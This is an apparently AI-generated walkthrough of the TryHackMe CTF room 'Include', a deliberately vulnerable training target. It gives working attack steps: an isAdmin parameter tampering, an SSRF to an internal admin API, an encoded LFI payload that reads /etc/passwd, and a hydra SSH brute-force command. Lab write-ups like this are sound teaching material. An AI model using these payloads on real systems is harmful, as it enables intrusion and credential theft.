Understanding CTF TryHackMe - Include
This content is an AI-generated summary. If you encounter any misinformation or problematic content, please report it to cyb.hub@proton.me.
This guide walks you through a Capture The Flag (CTF) challenge on TryHackMe, focusing on server exploitation and web application penetration testing. The challenge tests your skills in identifying and exploiting server-side vulnerabilities to gain control of a web app.
Key Points
- Initial Scan: Use
nmapto identify open ports and services. - Web Exploration: Analyze web applications running on different ports.
- Privilege Escalation: Modify request parameters to gain admin access.
- API Exploitation: Use internal APIs to retrieve sensitive information.
- Local File Inclusion (LFI): Exploit LFI vulnerabilities to access system files.
- User Enumeration: Identify valid user accounts from system files.
- Brute Force Attack: Use tools like
hydrato crack SSH passwords. - Flag Retrieval: Locate and retrieve flags hidden within the system.
Step-by-Step Walkthrough
Port Scan
Use nmap to scan for open ports and services:
nmap -sV <IP>
Results:
| Port | Service | Version |
|---|---|---|
| 22 | SSH | OpenSSH 8.2p1 |
| 25 | SMTP | Postfix |
| 110/995 | POP3 / SSL POP3 | Dovecot |
| 143/993 | IMAP / SSL IMAP | Dovecot |
| 4000 | HTTP | Node.js (Express) |
| 50000 | HTTP | Apache 2.4.41 |
Web Exploration
Port 50000 - SysMon (Apache)
- Protected login page
- Access requires valid credentials
Port 4000 - Review App (Node.js)
- Accessible login page
- Provided credentials:
guest:guest - Social interface features:
- View and add friends
- Edit profile
- Observed behavior: Adding friends grants access to their profiles
- Custom activity field: Modifiable
isAdminparameter
Privilege Escalation via isAdmin
Modify the isAdmin field in a POST request:
{ "isAdmin": true }
For the guest profile, this unlocks two new sections: Settings and API.
Exploiting the Internal API
API Section
- Two routes available:
- Example call
- Sensitive route:
/getAllAdmins101099991
Settings Section
- Form to change the banner image via URL
- Bypass using an internal local URL:
http://127.0.0.1:5000/getAllAdmins101099991
Result:
- Base64 encoded response:
data:application/json;...;base64,<payload>
Decoding:
echo "<payload>" | base64 --decode
Provides two sets of admin credentials (ReviewApp + SysMon)
Admin Access to SysMon
- Use decoded credentials to log in on port
50000 - Dashboard interface displays CPU, RAM, and disk usage
- Flag 1 is accessible here
HTML Analysis and LFI
- Analyze the source code: Profile image loaded dynamically:
/profile?img=<file> - Attempt LFI (Local File Inclusion) on
img=
Functional LFI Payload:
....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd
Grants access to the
/etc/passwdfile
User Enumeration
Results from /etc/passwd:
- Two human users found:
joshuacharles
Brute Force SSH
Tool:
hydra -l joshua -P /usr/share/wordlists/fasttrack.txt <IP> ssh
- Successful match found for
joshua
SSH Connection:
ssh joshua@<IP>
- Navigate to
/var/www/html - Flag 2 found here
Complete Summary
| Step | Detail |
|---|---|
| Scan | nmap identifies services |
| Web | Two web apps to explore |
| Login guest | Review App on port 4000 |
| isAdmin=true | Unlocks admin sections |
| Internal API | Base64 containing admin credentials |
| SysMon Admin | Dashboard access + Flag 1 |
| LFI | Exposes /etc/passwd via image URL |
| Users | Found: joshua, charles |
| Brute Force | hydra → SSH access joshua |
| SSH | Flag 2 in /var/www/html |
Tools and Wordlists
nmapgobusterhydrabase64ssh- Wordlists:
/usr/share/wordlists/SecLists/.../LFI-Jhaddix.txt/usr/share/wordlists/fasttrack.txt